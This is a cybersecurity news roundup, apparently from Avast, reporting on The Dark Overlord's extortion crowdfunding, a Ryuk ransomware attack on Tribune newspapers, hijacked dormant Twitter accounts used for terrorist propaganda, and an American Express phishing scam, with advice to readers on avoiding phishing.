The Dark Overlord, Twitter hijackers, and other bad guys
The year’s news kicks off with cyberattacks, terrorism, and phishing. Stay strong.
Crowdfunding for evil
The hacker or cybergang calling itself The Dark Overlord has started the new year on a dark note, announcing Wednesday that it is crowdfunding the release of sensitive legal documents linked to the 9/11 attack, which it claims to have stolen from international insurance companies Hiscox and Lloyd’s of London. As the crowdfunding endeavor hits each bitcoin milestone, The Dark Overlord promises to release increasingly juicier documents, declaring that it has poached over 18,000 relevant files. Both insurance companies report that their systems have not, in fact, been breached and that the data was stolen from associated law firms. The Dark Overlord made news last year when it released Orange is the New Black episodes ahead of their official premiere because Netflix refused to pay an extortion sum.
Newspapers under cyberattack
Tribune Publishing, one of the largest US media groups, suffered a cyberattack over the weekend causing delays and omitted sections in dozens of city newspapers across the country, including The Chicago Tribune, The Baltimore Sun, and The New York Daily News. While The Los Angeles Times and The San Diego Union Tribune were sold by Tribune Publishing earlier in 2018, both papers were also hit by the same cyberattack. The media group has not provided details about the cyberattack except to say that malware was involved, and that (ironically) only print editions of the paper were affected. Websites and apps suffered no problems. Inside sources at Tribune are said to have indicated the disruption was due to a Ryuk ransomware infection. Back in October, we reported about Ryuk ransomware taking down some North Carolina water utilities.
“At this time it is still unclear who was behind the attack and what the attacker’s goal was,” comments Luis Corrons, Avast security evangelist. “However the ability to stop newspapers from getting printed, or even scarier, being able to change what gets printed without being noticed could point to some really advanced attack – maybe state sponsored.”
An old trend is new again. While Twitter has had problems in the past with hijacked accounts, there has been a resurgence of the trend recently. Terrorists seem to have caught on to the longrunning Twitter security protocol, which never required email verification until June 2018. Hackers can assume control of abandoned accounts fairly easily, and many of the accounts are still linked to followers, some with tens of thousands. In recent weeks, a number of dormant accounts came back to life, all posting extreme terrorist propaganda. Cybersecurity experts have been working with Twitter to identify the hijacked accounts, and Twitter has taken down a number of them already.
A common phishing scam popping into inboxes lately pretends to be from American Express. The email states there is an issue with the user’s card, and prompts them to open an attachment. The attachment then opens an HTML window, and provides a list of fields into which the user is directed to input a host of personal data including card info, mother’s maiden name, mother’s birth date, first elementary school, and more. Once the user submits the info, it is sent back to the criminal C&C (command and control server), and the user is redirected to an authentic American Express “thank you” page.
“This is the classic, old-fashioned phishing attack,” points out Corrons. “As always there is one rule to heed here: whenever we receive a message that looks like it is in fact from our bank and that email asks us to enter any kind of information, NEVER ever click on any link or open an attachment that is in that message. Instead, always open your browser and go to your bank´s site by entering its URL manually. Dodging an attack really can be that simple.”
Avast is a global leader in cybersecurity, protecting hundreds of millions of users around the world. Safeguard your privacy and encrypt your online connection with SecureLine VPN.